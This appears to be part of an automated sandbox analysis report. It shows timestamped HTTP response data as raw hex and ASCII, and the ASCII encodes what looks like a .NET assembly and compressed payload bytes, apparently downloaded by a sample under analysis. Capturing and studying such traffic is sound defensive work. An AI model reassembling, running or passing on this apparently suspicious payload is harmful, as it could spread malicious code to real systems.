                                                                                                                            Data Ascii: F8020000036FDE0500061D3323036FDC0500062D1B02741C0100026F7E0600067E9F00000A28A000000A0A38CC020000036FDE0500061F0F332602741C0100026F7E0600060374B70000026F9F040006739900000A28A000000A0A389C020000036FDE0500061F1A332602741C0100026F7E06000603743E0100026FE506000
                                                                                                                            2022-10-03 14:03:31 UTC1879INData Raw: 32 38 36 43 30 30 30 30 30 41 31 33 30 39 37 33 39 44 30 34 30 30 30 36 32 35 30 36 31 31 30 39 35 46 36 46 41 30 30 34 30 30 30 36 32 41 30 33 36 46 44 45 30 35 30 30 30 36 31 46 31 41 33 33 36 31 30 34 36 46 44 45 30 35 30 30 30 36 31 46 31 41 33 33 32 42 30 33 37 34 33 45 30 31 30 30 30 32 36 46 45 35 30 36 30 30 30 36 31 33 30 41 30 34 37 34 33 45 30 31 30 30 30 32 36 46 45 35 30 36 30 30 30 36 31 33 30 42 37 33 45 33 30 36 30 30 30 36 32 35 31 31 30 41 31 31 30 42 35 46 36 46 45 36 30 36 30 30 30 36 32 41 30 34 36 46 44 45 30 35 30 30 30 36 31 46 30 41 33 33 32 32 30 33 37 34 42 37 30 30 30 30 30 32 36 46 39 46 30 34 30 30 30 36 30 34 36 46 44 43 30 35 30 30 30 36 32 38 36 42 30 30 30 30 30 41 31 33 30 43 36 41 31 31 30 43 35 46 37 33 45 34 30 36 30
                                                                                                                            Data Ascii: 286C00000A1309739D040006250611095F6FA00400062A036FDE0500061F1A3361046FDE0500061F1A332B03743E0100026FE5060006130A04743E0100026FE5060006130B73E306000625110A110B5F6FE60600062A046FDE0500061F0A33220374B70000026F9F040006046FDC050006286B00000A130C6A110C5F73E4060
                                                                                                                            2022-10-03 14:03:31 UTC1895INData Raw: 30 36 42 41 38 35 32 38 39 41 30 30 30 30 30 41 32 42 33 35 31 32 30 32 30 36 37 34 33 38 30 31 30 30 30 32 36 46 44 34 30 36 30 30 30 36 32 38 35 31 30 30 30 30 30 41 38 35 32 38 39 41 30 30 30 30 30 41 32 42 31 42 31 32 30 32 30 36 37 34 35 45 30 30 30 30 30 32 36 46 38 32 30 32 30 30 30 36 42 39 32 38 39 41 30 30 30 30 30 41 32 42 30 36 37 33 36 30 30 30 30 30 30 41 37 41 30 32 37 33 37 44 30 36 30 30 30 36 32 35 30 38 36 46 37 46 30 36 30 30 30 36 36 46 35 31 30 31 30 30 30 36 32 41 30 30 31 33 33 30 32 35 30 30 30 42 30 32 30 30 30 30 36 39 30 30 30 30 31 31 31 36 30 41 30 32 36 46 44 45 30 35 30 30 30 36 30 42 30 37 31 44 35 39 34 35 30 39 30 30 30 30 30 30 32 42 30 31 30 30 30 30 43 32 30 31 30 30 30 30 43 32 30 31 30 30 30 30 37 46 30 31 30 30 30
                                                                                                                            Data Ascii: 06BA85289A00000A2B3512020674380100026FD4060006285100000A85289A00000A2B1B120206745E0000026F82020006B9289A00000A2B06736000000A7A02737D06000625086F7F0600066F510100062A00133025000B02000069000011160A026FDE0500060B071D5945090000002B010000C2010000C20100007F01000
                                                                                                                            2022-10-03 14:03:31 UTC1911INData Raw: 30 36 30 41 30 32 36 46 36 46 30 30 30 30 30 36 30 42 30 37 36 46 44 45 30 35 30 30 30 36 31 46 30 42 33 33 30 44 30 37 30 36 32 38 34 44 30 31 30 30 30 36 31 36 46 45 30 31 30 43 32 42 30 42 30 37 30 36 32 38 35 30 30 31 30 30 30 36 31 36 46 45 30 31 30 43 30 38 32 43 31 33 30 33 37 34 31 41 30 31 30 30 30 32 36 46 36 43 30 36 30 30 30 36 30 44 30 32 30 39 36 46 37 31 30 31 30 30 30 36 32 41 30 30 30 36 32 41 30 30 30 30 38 41 30 33 36 46 39 33 30 30 30 30 30 41 32 44 30 44 30 33 32 38 31 32 30 37 30 30 30 36 36 46 36 38 30 30 30 30 30 41 32 43 30 43 30 32 37 45 45 30 30 30 30 30 30 41 30 33 36 46 43 31 30 30 30 30 30 41 32 41 30 30 31 33 33 30 30 44 30 30 42 42 30 30 30 30 30 30 34 44 30 30 30 30 31 31 30 32 36 46 36 46 30 30 30 30 30 36 30 41 30 36 36
                                                                                                                            Data Ascii: 060A026F6F0000060B076FDE0500061F0B330D0706284D01000616FE010C2B0B0706285001000616FE010C082C1303741A0100026F6C0600060D02096F710100062A00062A00008A036F9300000A2D0D0328120700066F6800000A2C0C027EE000000A036FC100000A2A0013300D00BB0000004D000011026F6F0000060A066
                                                                                                                            2022-10-03 14:03:31 UTC1927INData Raw: 30 36 31 36 30 41 31 36 30 42 30 39 31 37 35 38 30 44 30 39 31 31 30 36 36 46 37 44 30 31 30 30 30 41 33 32 39 43 30 36 31 37 33 33 30 36 37 33 46 33 30 30 30 30 30 41 37 41 30 36 31 37 33 31 32 38 30 36 31 33 30 35 32 42 31 34 30 37 31 46 35 34 37 45 32 33 30 31 30 30 30 34 31 31 30 35 39 35 44 39 44 37 30 42 31 31 30 35 31 37 35 38 31 33 30 35 31 31 30 35 31 42 33 32 45 37 30 38 30 37 31 42 30 36 35 39 32 38 37 44 30 32 30 30 30 36 30 38 36 46 38 30 30 31 30 30 30 41 31 33 30 37 44 45 30 37 30 38 36 46 30 36 30 30 30 30 30 41 44 43 31 31 30 37 32 41 30 30 30 30 30 31 31 30 30 30 30 30 30 32 30 30 31 39 30 30 41 46 43 38 30 30 30 37 30 30 30 30 30 30 30 30 45 32 30 32 30 33 31 46 31 38 36 34 44 32 36 46 38 31 30 31 30 30 30 41 30 34 31 39 33 33 30 31 32
                                                                                                                            Data Ascii: 06160A160B0917580D0911066F7D01000A329C0617330673F300000A7A061731280613052B14071F547E23010004110595D9D70B11051758130511051B32E708071B0659287D020006086F8001000A1307DE07086F0600000ADC11072A00000110000002001900AFC8000700000000E202031F1864D26F8101000A041933012
                                                                                                                            2022-10-03 14:03:31 UTC1943INData Raw: 30 30 30 30 30 41 30 32 31 41 38 44 31 31 30 30 30 30 30 31 37 44 36 41 30 32 30 30 30 34 30 32 32 38 31 46 30 33 30 30 30 36 32 41 30 30 36 45 30 32 31 46 35 30 38 44 42 31 30 30 30 30 30 31 37 44 37 32 30 32 30 30 30 34 30 32 32 38 31 41 30 30 30 30 30 41 30 32 30 33 32 38 31 41 30 33 30 30 30 36 32 41 31 33 33 30 30 35 30 30 34 44 30 30 30 30 30 30 30 32 30 30 30 30 31 31 30 32 37 42 36 41 30 32 30 30 30 34 30 32 30 32 37 42 36 42 30 32 30 30 30 34 30 41 30 36 31 37 35 38 37 44 36 42 30 32 30 30 30 34 30 36 30 33 39 43 30 32 37 42 36 42 30 32 30 30 30 34 30 32 37 42 36 41 30 32 30 30 30 34 38 45 36 39 33 33 31 34 30 32 30 32 37 42 36 41 30 32 30 30 30 34 31 36 32 38 31 43 30 33 30 30 30 36 30 32 31 36 37 44 36 42 30 32 30 30 30 34 30 32 30 32 37 42 36
                                                                                                                            Data Ascii: 00000A021A8D110000017D6A02000402281F0300062A006E021F508DB10000017D7202000402281A00000A0203281A0300062A133005004D00000002000011027B6A02000402027B6B0200040A0617587D6B02000406039C027B6B020004027B6A0200048E69331402027B6A02000416281C03000602167D6B02000402027B6
                                                                                                                            2022-10-03 14:03:31 UTC1959INData Raw: 30 39 39 34 36 45 31 33 30 42 31 31 30 42 31 31 30 42 35 41 31 33 31 30 31 31 30 38 30 34 30 39 39 34 36 45 35 41 31 33 31 31 30 36 31 31 31 30 31 35 36 45 35 46 31 31 31 31 36 44 36 45 35 38 30 32 30 39 31 37 35 38 39 34 36 45 35 38 35 38 30 41 30 32 30 39 31 38 35 38 30 36 36 39 39 45 30 36 31 46 32 30 36 34 31 31 31 30 31 46 32 30 36 34 35 38 31 31 31 31 31 46 32 30 36 34 35 38 30 41 30 39 31 37 35 39 31 33 30 34 32 42 34 41 31 31 30 42 30 33 31 31 30 34 39 34 36 45 35 41 31 33 31 32 31 31 30 38 30 34 31 31 30 34 39 34 36 45 35 41 31 33 31 33 30 36 31 31 31 33 31 35 36 45 35 46 31 31 31 32 36 44 31 37 36 32 36 45 35 38 30 32 31 31 30 34 31 37 35 38 39 34 36 45 35 38 35 38 30 41 30 32 31 31 30 34 31 38 35 38 30 36 36 39 39 45 30 36 31 46 32 30 36 34 31
                                                                                                                            Data Ascii: 09946E130B110B110B5A131011080409946E5A1311061110156E5F11116D6E5802091758946E58580A0209185806699E061F206411101F20645811111F2064580A09175913042B4A110B031104946E5A13121108041104946E5A1313061113156E5F11126D17626E580211041758946E58580A021104185806699E061F20641
                                                                                                                            2022-10-03 14:03:31 UTC1975INData Raw: 30 30 30 30 43 34 30 30 30 30 30 30 35 45 30 31 30 30 30 30 37 38 30 30 30 30 30 30 41 39 30 30 30 30 30 30 32 33 30 31 30 30 30 30 35 45 30 31 30 30 30 30 35 45 30 31 30 30 30 30 46 37 30 30 30 30 30 30 34 43 30 30 30 30 30 30 35 45 30 31 30 30 30 30 33 37 30 31 30 30 30 30 36 32 30 30 30 30 30 30 30 35 30 30 30 30 30 30 33 36 30 30 30 30 30 30 34 42 30 31 30 30 30 30 44 46 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 46 30 31 30 30 30 30 35 45 30 31 30 30 30 30 38 45 30 30 30 30 30 30 33 38 35 39 30 31 30 30 30 30 30 32 30 33 37 34 37 34 30 30 30 30 30 32 36 46 32 45 30 33 30 30 30 36 32 38 34 36 30 30 30 30 30 41 32 38 41 30 30 34 30 30 30 36 33 38 34 34 30 31 30 30 30 30 30 32 30 33 37 34 30 42 30 31 30 30 30 32 36 46 33 33 30 36 30 30 30 36 32 38 41
                                                                                                                            Data Ascii: 0000C40000005E01000078000000A9000000230100005E0100005E010000F70000004C0000005E010000370100006200000005000000360000004B010000DF000000200000000F0100005E0100008E0000003859010000020374740000026F2E030006284600000A28A004000638440100000203740B0100026F3306000628A
                                                                                                                            2022-10-03 14:03:31 UTC1991INData Raw: 30 37 35 38 30 32 37 42 33 33 30 33 30 30 30 34 30 32 37 42 33 35 30 33 30 30 30 34 30 37 35 38 39 31 39 43 30 37 31 37 35 39 32 35 30 42 31 36 32 46 45 34 32 42 31 34 30 32 37 42 33 33 30 33 30 30 30 34 30 32 37 42 33 35 30 33 30 30 30 34 30 33 30 34 30 36 32 38 31 45 30 30 30 30 30 41 30 32 30 32 37 42 33 35 30 33 30 30 30 34 30 36 35 38 37 44 33 35 30 33 30 30 30 34 30 36 32 41 30 30 30 30 30 30 31 33 33 30 30 34 30 30 33 37 30 30 30 30 30 30 30 32 30 30 30 30 31 31 30 32 37 42 33 41 30 33 30 30 30 34 32 44 30 36 37 33 46 33 30 30 30 30 30 41 37 41 30 32 37 42 33 35 30 33 30 30 30 34 30 32 37 42 33 36 30 33 30 30 30 34 33 32 30 32 31 35 32 41 30 32 37 42 33 33 30 33 30 30 30 34 30 32 30 32 37 42 33 35 30 33 30 30 30 34 30 41 30 36 31 37 35 38 37 44 33
                                                                                                                            Data Ascii: 0758027B33030004027B350300040758919C071759250B162FE42B14027B33030004027B35030004030406281E00000A02027B3503000406587D35030004062A000000133004003700000002000011027B3A0300042D0673F300000A7A027B35030004027B360300043202152A027B3303000402027B350300040A0617587D3
                                                                                                                            2022-10-03 14:03:31 UTC2007INData Raw: 35 38 32 41 30 32 37 42 36 45 30 33 30 30 30 34 36 46 37 32 30 31 30 30 30 41 36 39 30 37 35 39 31 33 30 34 30 32 37 42 37 32 30 33 30 30 30 34 31 31 30 34 30 33 30 39 30 35 30 37 35 38 31 32 30 32 36 46 32 33 30 30 30 30 30 36 32 43 31 33 30 32 37 42 36 45 30 33 30 30 30 34 30 38 30 37 35 39 36 41 31 37 36 46 37 37 30 31 30 30 30 41 32 36 30 38 32 41 30 32 37 42 36 45 30 33 30 30 30 34 30 33 30 34 30 35 36 46 37 35 30 31 30 30 30 41 30 43 30 38 32 43 31 36 30 32 37 42 37 32 30 33 30 30 30 34 31 31 30 34 30 33 30 39 30 38 30 37 35 38 30 38 30 35 46 45 30 34 36 46 32 32 30 30 30 30 30 36 30 38 30 37 35 38 32 41 30 32 30 35 32 38 31 42 30 36 30 30 30 36 30 32 30 33 30 34 30 35 32 38 31 41 30 36 30 30 30 36 30 41 30 36 30 37 35 38 32 41 30 30 30 30 30 30 31
                                                                                                                            Data Ascii: 582A027B6E0300046F7201000A6907591304027B720300041104030905075812026F230000062C13027B6E0300040807596A176F7701000A26082A027B6E0300040304056F7501000A0C082C16027B72030004110403090807580805FE046F220000060807582A0205281B06000602030405281A0600060A0607582A0000001
                                                                                                                            2022-10-03 14:03:31 UTC2023INData Raw: 33 30 30 35 30 30 31 43 30 30 30 30 30 30 45 46 30 30 30 30 31 31 30 32 32 38 33 37 30 30 30 30 30 41 30 41 31 32 30 30 31 37 36 41 32 38 31 32 30 32 30 30 30 41 37 44 43 46 30 35 30 30 30 34 30 32 32 38 31 41 30 30 30 30 30 41 32 41 31 45 30 32 32 38 31 41 30 30 30 30 30 41 32 41 35 41 32 38 43 30 30 35 30 30 30 36 32 38 43 32 30 35 30 30 30 36 37 32 36 43 31 43 30 30 37 30 31 34 32 38 35 45 30 30 30 30 30 36 32 41 30 30 32 36 30 32 31 46 31 41 32 38 44 41 30 35 30 30 30 36 32 41 30 30 30 30 33 41 30 32 32 38 45 33 30 36 30 30 30 36 30 32 30 33 37 44 44 30 30 35 30 30 30 34 32 41 30 30 31 45 30 32 37 42 44 30 30 35 30 30 30 34 32 41 32 32 30 32 30 33 37 44 44 30 30 35 30 30 30 34 32 41 30 30 30 30 30 30 33 32 30 32 32 38 45 35 30 36 30 30 30 36 38 43 33
                                                                                                                            Data Ascii: 3005001C000000EF00001102283700000A0A1200176A281202000A7DCF05000402281A00000A2A1E02281A00000A2A5A28C005000628C2050006726C1C007014285E0000062A0026021F1A28DA0500062A00003A0228E306000602037DD00500042A001E027BD00500042A2202037DD00500042A000000320228E50600068C3
                                                                                                                            2022-10-03 14:03:31 UTC2039INData Raw: 35 41 34 33 35 32 30 37 46 31 42 43 30 35 42 39 31 39 37 32 36 43 39 32 38 34 45 39 32 37 34 43 39 39 32 34 34 33 30 39 37 42 44 35 38 35 38 43 30 37 44 43 31 43 44 46 43 33 37 46 44 35 37 46 43 31 37 42 43 32 30 31 35 41 38 43 41 42 31 37 46 41 31 37 46 34 44 46 36 34 45 46 35 31 42 44 32 46 42 43 32 46 42 43 42 42 37 39 41 46 31 43 43 31 34 37 42 44 41 42 37 41 44 35 45 44 44 44 42 32 34 37 43 42 43 42 34 34 45 30 44 39 42 43 35 33 42 43 31 33 39 32 45 45 35 36 37 46 41 41 30 34 44 39 31 41 45 32 36 34 32 36 46 31 44 32 31 45 36 35 30 42 39 32 43 43 42 41 36 35 39 33 43 38 32 37 39 34 44 35 37 45 43 34 44 42 31 32 45 44 30 34 38 34 44 31 30 39 45 32 37 35 31 37 32 38 39 44 37 31 32 32 45 32 37 39 43 34 36 46 43 38 33 30 36 34 45 45 42 44 44 44 42 42 42
                                                                                                                            Data Ascii: 5A435207F1BC05B919726C9284E9274C992443097BD5858C07DC1CDFC37FD57FC17BC2015A8CAB17FA17F4DF64EF51BD2FBC2FBCBB79AF1CC147BDAB7AD5EDDDB247CBCB44E0D9BC53BC1392EE567FAA04D91AE26426F1D21E650B92CCBA6593C82794D57EC4DB12ED0484D109E27517289D7122E279C46FC83064EEBDDDBBB
                                                                                                                            2022-10-03 14:03:31 UTC2055INData Raw: 46 35 46 30 45 35 44 46 33 42 31 45 33 46 34 36 43 46 44 39 45 41 45 31 46 43 45 44 36 43 42 38 45 39 44 36 33 46 30 31 38 44 34 37 36 38 44 33 45 45 43 46 39 45 39 33 39 45 41 44 36 44 32 35 46 39 46 33 35 39 32 35 39 42 45 43 43 39 35 31 37 39 30 44 37 37 32 37 37 37 43 34 36 43 46 30 33 38 44 45 33 30 44 41 46 33 44 46 31 46 35 35 46 45 32 37 42 33 34 43 36 35 35 36 45 44 35 36 42 41 31 38 31 38 41 45 45 46 31 37 32 34 35 46 38 42 32 39 44 37 46 42 41 36 41 30 37 34 42 46 30 44 31 46 44 33 46 44 46 33 31 33 46 32 46 44 33 46 35 45 34 42 32 39 38 36 34 41 38 37 35 45 46 35 43 31 42 44 44 44 45 43 35 33 39 36 42 37 38 37 35 36 38 39 37 46 36 38 33 43 36 44 42 37 45 46 38 42 42 32 38 38 46 44 35 41 45 34 33 46 44 32 46 44 32 37 33 44 30 46 46 44 45 36 46
                                                                                                                            Data Ascii: F5F0E5DF3B1E3F46CFD9EAE1FCED6CB8E9D63F018D4768D3EECF9E939EAD6D25F9F359259BECC951790D772777C46CF038DE30DAF3DF1F55FE27B34C6556ED56BA1818AEEF17245F8B29D7FBA6A074BF0D1FD3FDF313F2FD3F5E4B29864A875EF5C1BDDDEC5396B78756897F683C6DB7EF8BB288FD5AE43FD2FD273D0FFDE6F
                                                                                                                            2022-10-03 14:03:31 UTC2071INData Raw: 31 42 35 44 44 41 33 43 46 46 32 43 41 45 31 33 35 41 44 30 35 32 39 39 32 34 42 35 36 45 39 34 39 31 45 44 36 39 30 30 35 33 33 34 46 46 35 34 37 42 37 32 46 42 31 30 37 45 35 38 31 46 38 31 34 32 35 39 34 43 36 44 31 32 42 39 38 32 34 35 39 43 31 34 43 30 33 43 44 32 33 42 46 42 30 36 41 30 42 42 31 45 34 38 43 33 46 32 42 37 34 39 36 46 42 34 31 34 45 36 32 31 32 45 44 34 30 36 42 36 34 45 33 36 32 39 45 44 45 43 35 42 45 33 43 32 44 39 36 33 33 38 43 43 31 45 32 33 46 41 35 41 43 34 42 34 46 37 33 33 30 46 38 44 38 44 34 42 30 42 37 33 41 34 42 34 37 31 37 43 42 39 36 44 34 42 30 39 37 33 43 37 45 43 36 31 46 35 33 32 36 45 31 36 45 38 39 38 39 34 33 34 45 36 45 31 34 41 30 34 38 42 37 30 42 33 43 45 35 30 41 30 41 37 33 36 34 39 36 34 43 41 33 44 44
                                                                                                                            Data Ascii: 1B5DDA3CFF2CAE135AD0529924B56E9491ED69005334FF547B72FB107E581F8142594C6D12B982459C14C03CD23BFB06A0BB1E48C3F2B7496FB414E6212ED406B64E3629EDEC5BE3C2D96338CC1E23FA5AC4B4F7330F8D8D4B0B73A4B4717CB96D4B0973C7EC61F5326E16E8989434E6E14A048B70B3CE50A0A7364964CA3DD
                                                                                                                            2022-10-03 14:03:31 UTC2087INData Raw: 46 37 43 39 31 30 31 46 30 39 32 36 43 33 35 33 44 42 34 43 33 36 39 43 43 44 36 46 42 41 39 35 31 37 35 46 33 44 35 35 44 37 45 36 45 35 31 42 39 45 32 44 30 36 37 39 30 42 32 35 32 36 33 39 37 42 44 37 32 30 43 33 45 33 42 36 36 46 31 31 45 39 42 38 36 42 37 35 42 39 35 42 31 37 36 38 44 45 34 38 31 45 44 37 42 42 35 37 37 42 44 33 30 42 35 42 45 41 35 30 30 43 42 41 46 42 35 41 35 37 36 33 45 46 36 42 39 41 44 30 44 31 42 33 42 32 42 41 37 30 37 34 43 37 42 38 45 31 43 44 45 37 46 42 45 45 42 35 37 39 42 44 45 30 45 33 43 32 36 30 42 46 33 42 42 32 34 43 41 46 36 32 46 30 31 44 37 41 39 42 32 45 43 46 43 35 45 39 37 32 36 33 44 42 32 37 33 37 37 30 37 30 38 37 42 31 33 41 31 30 31 46 38 43 34 35 45 38 35 32 31 46 30 36 44 36 39 42 37 35 46 37 43 36 39
                                                                                                                            Data Ascii: F7C9101F0926C353DB4C369CCD6FBA95175F3D55D7E6E51B9E2D06790B2526397BD720C3E3B66F11E9B86B75B95B1768DE481ED7BB577BD30B5BEA500CBAFB5A5763EF6B9AD0D1B3B2BA7074C7B8E1CDE7FBEEB579BDE0E3C260BF3BB24CAF62F01D7A9B2ECFC5E97263DB2737707087B13A101F8C45E8521F06D69B75F7C69
                                                                                                                            2022-10-03 14:03:31 UTC2103INData Raw: 42 35 30 32 31 45 44 34 41 39 38 36 41 30 41 44 46 37 45 46 32 39 31 41 38 44 39 33 31 44 41 38 31 46 44 36 41 36 44 37 36 41 38 37 30 34 46 37 41 38 32 35 46 31 42 45 44 46 35 37 38 35 38 46 34 37 31 35 42 45 38 46 34 46 45 44 44 37 31 46 46 42 45 44 35 44 42 41 36 38 45 45 34 34 37 41 33 32 31 44 35 42 36 41 38 36 36 44 45 39 42 44 31 32 46 42 37 43 41 33 39 46 46 37 30 39 37 43 30 45 36 31 41 46 35 41 39 42 35 43 33 37 31 34 36 33 42 35 42 44 41 41 33 42 46 34 30 39 37 32 31 38 46 34 42 31 34 43 34 37 35 38 41 38 41 39 44 31 45 39 41 33 46 44 44 45 44 30 38 38 35 44 46 34 46 31 30 32 44 41 33 46 44 39 32 38 46 34 31 45 31 32 46 42 31 39 41 33 44 30 38 36 33 32 36 33 46 35 31 41 35 41 32 46 38 30 33 36 41 38 45 45 35 31 44 41 44 31 30 45 35 41 32 46 41
                                                                                                                            Data Ascii: B5021ED4A986A0ADF7EF291A8D931DA81FD6A6D76A8704F7A825F1BEDF57858F4715BE8F4FEDD71FFBED5DBA68EE447A321D5B6A866DE9BD12FB7CA39FF7097C0E61AF5A9B5C371463B5BDAA3BF4097218F4B14C4758A8A9D1E9A3FDDED0885DF4F102DA3FD928F41E12FB19A3D0863263F51A5A2F8036A8EE51DAD10E5A2FA
                                                                                                                            2022-10-03 14:03:31 UTC2119INData Raw: 43 38 34 44 36 39 37 36 39 37 37 31 45 39 46 41 38 31 46 44 35 31 35 32 35 37 31 31 39 46 33 45 34 43 36 42 43 39 42 36 39 36 32 31 46 46 45 41 38 42 33 45 44 38 33 41 44 30 33 37 39 32 36 33 34 36 36 42 34 37 42 43 42 44 32 31 41 45 45 43 46 33 35 39 31 37 37 43 38 38 44 35 31 41 42 35 36 46 46 35 45 38 46 33 31 33 38 43 45 45 41 36 31 42 43 38 30 43 37 33 32 44 43 31 31 32 33 45 32 33 35 31 35 34 31 36 38 45 33 38 33 37 31 44 39 33 45 39 31 37 39 41 45 38 34 42 42 43 46 35 32 34 34 42 46 34 46 31 31 35 44 44 38 43 39 46 35 35 43 32 44 31 37 46 39 41 39 42 32 39 36 41 41 30 41 45 45 39 33 42 44 39 31 45 39 41 36 39 42 39 37 46 45 46 34 39 31 38 34 44 45 37 34 42 38 34 37 41 34 42 41 37 39 45 36 42 30 43 34 35 43 46 37 45 41 32 30 46 32 36 31 33 42 43 34
                                                                                                                            Data Ascii: C84D69769771E9FA81FD515257119F3E4C6BC9B69621FFEA8B3ED83AD0379263466B47BCBD21AEECF359177C88D51AB56FF5E8F3138CEEA61BC80C732DC1123E235154168E38371D93E9179AE84BBCF5244BF4F115DD8C9F55C2D17F9A9B296AA0AEE93BD91E9A69B97FEF49184DE74B847A4BA79E6B0C45CF7EA20F2613BC4
                                                                                                                            2022-10-03 14:03:31 UTC2135INData Raw: 44 41 34 41 46 45 43 41 46 44 32 39 38 42 35 37 31 35 33 46 35 46 39 36 33 46 37 42 34 35 31 38 42 44 36 39 38 35 33 36 41 33 41 33 30 39 33 45 41 32 36 32 42 35 33 35 34 45 32 42 45 30 34 41 41 33 44 46 31 46 44 39 35 41 35 31 44 33 46 46 44 32 43 42 37 42 45 37 43 36 37 36 45 34 38 46 37 33 31 44 44 36 46 45 45 42 42 41 39 46 30 44 35 39 44 33 31 43 34 43 46 45 41 30 38 44 41 31 45 44 35 46 31 31 32 45 36 42 41 33 32 42 36 44 36 43 36 43 35 39 33 35 38 36 39 46 30 41 35 33 32 33 34 44 46 34 41 34 34 34 34 45 35 42 35 30 33 34 32 41 44 31 44 44 39 35 30 37 35 39 46 39 35 35 37 46 35 33 46 37 39 37 39 34 42 31 32 44 32 32 37 44 44 32 44 39 44 37 38 32 38 43 32 45 37 44 35 37 36 41 37 30 46 38 46 45 45 31 38 46 35 44 30 34 36 37 39 33 37 46 31 31 37 38 44
                                                                                                                            Data Ascii: DA4AFECAFD298B57153F5F963F7B4518BD698536A3A3093EA262B5354E2BE04AA3DF1FD95A51D3FFD2CB7BE7C676E48F731DD6FEEBBA9F0D59D31C4CFEA08DA1ED5F112E6BA32B6D6C6C5935869F0A53234DF4A4444E5B50342AD1DD950759F9557F53F79794B12D227DD2D9D7828C2E7D576A70F8FEE18F5D0467937F1178D
                                                                                                                            2022-10-03 14:03:31 UTC2151INData Raw: 34 35 36 43 43 31 35 44 42 37 37 42 36 45 32 32 37 34 36 37 42 30 35 36 34 44 41 38 44 41 32 34 42 36 36 31 33 31 37 44 30 33 42 36 43 36 44 31 41 39 42 33 30 38 41 42 32 31 32 31 35 46 43 36 33 30 37 30 32 35 45 30 42 46 37 46 31 44 30 31 32 45 39 36 44 43 46 36 34 42 45 33 46 38 43 30 34 35 37 44 36 37 42 32 41 35 45 35 45 39 39 45 43 41 39 39 33 39 43 31 44 46 43 37 34 30 44 44 42 31 35 44 31 31 42 34 32 37 42 33 44 39 35 32 42 44 42 30 46 44 36 45 44 41 31 36 44 39 45 43 41 39 36 39 36 44 35 39 45 31 39 42 36 38 43 37 36 37 43 36 30 35 34 43 33 42 33 44 39 35 33 39 33 31 39 42 37 32 31 37 36 35 39 46 31 38 30 35 33 39 33 36 37 43 37 34 30 36 41 34 42 36 45 33 34 43 33 33 33 44 39 35 32 43 41 33 33 36 45 37 34 42 34 42 33 44 39 35 33 34 32 41 46 45 46
                                                                                                                            Data Ascii: 456CC15DB77B6E227467B0564DA8DA24B661317D03B6C6D1A9B308AB21215FC6307025E0BF7F1D012E96DCF64BE3F8C0457D67B2A5E5E99ECA9939C1DFC740DDB15D11B427B3D952BDB0FD6EDA16D9ECA9696D59E19B68C767C6054C3B3D9539319B7217659F180539367C7406A4B6E34C333D952CA336E74B4B3D95342AFEF
                                                                                                                            2022-10-03 14:03:31 UTC2167INData Raw: 31 39 36 35 35 33 36 45 39 44 30 34 39 34 46 33 34 35 46 34 45 33 44 39 46 42 34 33 42 38 43 42 39 41 45 37 30 39 41 32 45 43 44 34 42 37 31 39 34 30 45 36 44 43 36 35 44 39 45 36 38 41 42 38 43 42 38 35 46 45 31 31 42 37 45 31 39 41 38 32 43 44 32 37 41 36 45 33 32 45 36 34 33 33 36 45 35 39 44 44 32 31 45 45 32 43 32 42 35 46 33 39 33 45 31 36 46 46 37 31 38 44 33 45 30 38 42 41 45 45 45 35 31 35 38 37 45 43 39 31 36 44 45 31 39 43 41 44 41 34 35 34 36 32 38 33 43 38 33 41 38 37 46 33 43 43 30 33 46 35 39 36 32 33 46 35 39 36 36 34 44 30 39 34 35 34 31 46 38 34 38 32 42 41 31 37 34 35 31 43 38 42 35 34 31 44 34 43 43 37 35 42 36 37 35 31 46 35 34 30 37 41 34 43 46 38 44 33 34 42 30 31 39 34 44 43 34 35 33 46 46 45 41 41 30 44 46 38 37 34 32 31 33 39 43
                                                                                                                            Data Ascii: 1965536E9D0494F345F4E3D9FB43B8CB9AE709A2ECD4B71940E6DC65D9E68AB8CB85FE11B7E19A82CD27A6E32E64336E59DD21EE2C2B5F393E16FF718D3E08BAEEE51587EC916DE19CADA4546283C83A87F3CC03F59623F59664D094541F8482BA17451C8B541D4CC75B6751F5407A4CF8D34B0194DC453FFEAA0DF8742139C
                                                                                                                            2022-10-03 14:03:31 UTC2183INData Raw: 30 44 35 43 32 43 44 38 36 42 33 44 30 45 42 43 46 34 37 33 36 30 45 41 33 43 41 46 30 31 42 44 44 46 33 38 34 42 32 44 46 39 31 33 35 45 36 43 36 41 30 31 42 34 45 45 39 37 35 36 35 34 38 33 33 46 37 37 46 37 35 46 32 32 36 37 34 37 38 41 45 43 39 45 41 46 33 36 46 33 44 33 36 39 43 46 42 45 33 46 30 42 33 41 42 45 44 34 45 42 46 31 35 39 44 30 31 30 44 34 38 35 33 46 35 31 45 35 41 42 46 39 30 39 38 41 31 41 45 33 42 44 46 41 33 42 35 38 42 38 41 45 35 30 37 34 45 42 43 34 33 34 39 42 42 34 45 33 44 30 33 32 39 38 33 36 30 38 34 34 43 38 37 42 32 35 30 38 43 39 31 42 31 39 41 31 34 38 37 38 46 35 30 31 39 32 39 39 44 36 44 46 33 39 44 42 39 33 33 34 33 42 46 44 41 44 38 36 34 35 37 33 41 42 42 33 30 44 44 39 33 46 33 39 44 39 39 30 43 46 36 31 41 42 42
                                                                                                                            Data Ascii: 0D5C2CD86B3D0EBCF47360EA3CAF01BDDF384B2DF9135E6C6A01B4EE975654833F77F75F2267478AEC9EAF36F3D369CFBE3F0B3ABED4EBF159D010D4853F51E5ABF9098A1AE3BDFA3B58B8AE5074EBC4349BB4E3D03298360844C87B2508C91B19A14878F5019299D6DF39DB93343BFDAD864573ABB30DD93F39D990CF61ABB
                                                                                                                            2022-10-03 14:03:31 UTC2199INData Raw: 38 35 35 34 46 33 42 34 32 33 43 46 45 34 36 32 34 39 34 44 35 44 37 32 31 32 37 30 39 33 34 45 44 31 38 36 32 41 35 46 43 45 44 31 38 36 32 37 30 32 34 36 35 33 42 34 41 34 32 45 38 45 34 36 30 45 42 34 32 43 46 39 45 37 36 41 43 42 45 33 35 30 39 33 43 45 39 32 31 37 33 34 45 37 39 37 34 36 32 44 42 36 34 30 45 46 38 45 44 39 45 32 35 34 44 41 37 38 38 31 38 42 41 44 43 31 42 33 44 43 30 43 38 42 42 32 43 41 32 43 39 34 43 33 39 43 46 32 39 44 43 45 39 30 32 39 46 39 44 32 33 32 45 43 34 37 31 45 41 46 39 44 32 33 35 32 41 37 34 39 36 33 44 46 46 36 36 37 34 38 44 30 36 32 33 38 43 35 30 45 42 34 35 37 45 35 38 36 41 30 34 35 42 38 33 44 46 37 37 31 35 39 30 30 45 35 39 33 37 35 38 42 35 35 35 38 46 39 39 32 30 37 37 46 37 44 46 38 35 44 46 35 31 45 45
